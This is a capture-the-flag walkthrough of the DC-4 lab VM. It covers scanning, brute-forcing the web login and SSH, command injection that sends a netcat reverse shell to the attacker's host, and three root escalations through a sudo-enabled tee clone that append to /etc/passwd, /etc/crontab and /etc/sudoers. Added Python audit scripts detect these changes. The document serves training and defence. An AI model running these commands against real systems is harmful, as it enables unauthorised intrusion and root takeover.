DC-4

Routine IP and port scan

root@kali:~# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:64:e1:4d, IPv4: 192.168.32.135
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
......
192.168.32.145  00:0c:29:b3:0a:ad       VMware, Inc.
......
root@kali:~# nmap 192.168.32.145
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 02:22 EDT
Nmap scan report for 192.168.32.145
Host is up (0.00014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B3:0A:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds

Oh ho, ssh+http again this time. Is it the usual guess-the-credentials routine? Let's look at port 80 first.

It is an "Admin Information System Login" page that demands a username and password straight away. Who can stand up to that? Brute-force it, then; what else is there to do...

Brute-forcing showed that the password is happy, and a 302 redirect followed. Once inside there is a "run command" feature; although it is limited to three commands, I would be doing it a disservice not to capture the request and run an arbitrary command instead. That worked, so the next step is a reverse shell.

Reverse shell

radio=nc+-e+/bin/bash+192.168.32.135+9999&submit=Run
python -c 'import pty; pty.spawn("/bin/bash")'

The reverse shell came back successfully.

In the home directory there are three user accounts: charles, jim and sam. After going through each folder, only jim's contained a file worth noting, old-passwords.bak. Save it locally, turn it into a wordlist and go brute-force SSH with it (shades of the DC-2 approach).

Turn the three usernames and the passwords into wordlists and brute-force with hydra:

root@kali:~# hydra -L user.txt -P passwd.txt ssh://192.168.32.145
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-15 10:29:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 756 login tries (l:3/p:252), ~48 tries per task
[DATA] attacking ssh://192.168.32.145:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 580 to do in 00:04h, 16 active
[22][ssh] host: 192.168.32.145   login: jim   password: jibril04

One credential was successfully brute-forced: login: jim, password: jibril04. Connect and take a look.

jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

Of the three files, mbox was the only one I had not yet looked at. It turned out to be an e-mail, so check /var/mail as well, and sure enough there is more to find!

jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

That gives us charles's password. After logging in, following the advice of the experts, the usual first step is sudo -l to check the user's privileges. jim had no usable privileges when checked earlier, but charles can run /usr/bin/teehee as root without a password. Clearly someone on good terms with the boss gets privileges out of the ordinary.

charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

teehee's usage is indeed quite amazing: -a appends to the end of the file instead of overwriting it.

Privilege escalation

Method one: add a new user with root privileges directly

Because charles can run teehee without a password and teehee can write to files, combining it with sudo lets us add a new user.

charles@dc-4:~$ echo "Tr0jAn::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Tr0jAn::0:0:::/bin/bash
charles@dc-4:~$ su Tr0jAn
root@dc-4:/home/charles#

Root privileges obtained. Note that with this method only one root user can be online at a time; if the real root user is logged in, passwordless escalation will not work!

Field explanation

Tr0jAn::0:0:::/bin/bash
[username]:[password]:[UID]:[GID]:[description]:[home directory]:[login shell]
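From the defender's side, the appended line is easy to spot if /etc/passwd is actually parsed. This added example (not from the original post) checks passwd-format text against the field layout above and flags entries that hand out root without a password; the sample content is constructed for the demo, with the walkthrough's line as the last entry.

```python
# Added example (not from the original post): parse passwd-format lines using
# the field layout above and flag entries that hand out root without a password.
# SAMPLE_PASSWD is constructed for this demo; its last line is the one the
# walkthrough appends.
from dataclasses import dataclass

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
Tr0jAn::0:0:::/bin/bash
"""


@dataclass
class Finding:
    line_no: int
    user: str
    reason: str


def audit_passwd(text: str) -> list[Finding]:
    """Return one Finding per problem: malformed line, UID-0 account other
    than root, or an empty password field (why su above never prompted)."""
    findings = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(no, line, f"expected 7 fields, got {len(fields)}"))
            continue
        user, passwd, uid, gid, _gecos, _home, _shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            findings.append(Finding(no, user, "non-numeric UID/GID"))
            continue
        if int(uid) == 0 and user != "root":
            findings.append(Finding(no, user, "UID 0 account other than root"))
        if passwd == "":
            findings.append(Finding(no, user, "empty password field"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line_no}: {f.user}: {f.reason}")
```

Run against the real file with `audit_passwd(open("/etc/passwd").read())`; a clean system returns an empty list.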

Method two: escalate by getting a script executed through critical files

The relatively important files on Linux are basically the scheduled-task file (crontab) and the sudoers file.

1. The scheduled-task file (crontab)
charles@dc-4:~$ echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:~$ /bin/sh
# whoami
root
2. The sudoers file

Look at how the sudoers file is written on the Kali machine and imitate it on the target:

root@kali:~# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

@includedir /etc/sudoers.d

It looks like all that is needed is to write charles ALL=(ALL:ALL) ALL into the /etc/sudoers file:

charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
    (ALL : ALL) ALL
charles@dc-4:~$ sudo /bin/bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for charles: 
root@dc-4:/home/charles# whoami
root

After the write succeeds, sudo -l shows the permitted commands are now ALL, so any command can be run, i.e. sudo /bin/bash; enter charles's login password and that's it. Finally, get the flag:
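Both variants of method two leave a one-line trace in a root-owned config file, which a periodic audit can catch. This added example (not from the original post) parses system-crontab and sudoers text and reports root cron jobs that set the setuid/setgid bit and per-user sudoers rules granting ALL or NOPASSWD; the sample contents are constructed for the demo and include the lines appended above.

```python
# Added example (not from the original post): audit the two root-owned files
# that method two appends to. Sample contents are constructed for the demo.
import re

SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
* * * * * root chmod 4777 /bin/sh
"""

SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
charles ALL=(root) NOPASSWD: /usr/bin/teehee
charles ALL=(ALL:ALL) ALL
"""

# chmod with a symbolic +s, or an octal mode whose leading digit sets setuid/setgid
SETUID_CHMOD = re.compile(r"\bchmod\s+(?:[ugoa]*\+[a-z]*s|[2-7][0-7]{3})\b")


def risky_cron_jobs(text: str) -> list[str]:
    """Commands from system-crontab lines that run as root and set setuid/setgid."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # blank, comment or VAR=value line
        parts = line.split(None, 6)       # 5 time fields, user, command
        if len(parts) == 7 and parts[5] == "root" and SETUID_CHMOD.search(parts[6]):
            hits.append(parts[6])
    return hits


def sudoers_grants(text: str) -> list[tuple[str, str]]:
    """(user, spec) for per-user rules, other than root's, granting ALL or NOPASSWD."""
    grants = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "@", "%", "Defaults")):
            continue                      # comments, includes, groups, defaults
        parts = line.split(None, 1)
        if len(parts) != 2 or parts[0] == "root" or "=" not in parts[1]:
            continue
        user, spec = parts
        cmds = spec.split(")", 1)[1] if ")" in spec else spec.split("=", 1)[1]
        if cmds.strip() == "ALL" or "NOPASSWD" in cmds:
            grants.append((user, spec))
    return grants
```

The original NOPASSWD teehee rule is reported as well, which is the misconfiguration the whole escalation rests on.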

root@dc-4:/# find / -name "*flag*"
......
/root/flag.txt
......
root@dc-4:/# cat /root/flag
cat: /root/flag: No such file or directory
root@dc-4:/# cat /root/flag.txt
888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 

Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Knowledge points used in this box:

1. Weak login password;
2. An arbitrary code execution vulnerability;
3. Information leaked through e-mail;
4. A low-privilege account can run high-privilege commands without a password;
5. Unauthorized modification of data, leading to privilege escalation.
Last modified: 28 August 2020, 11:53 AM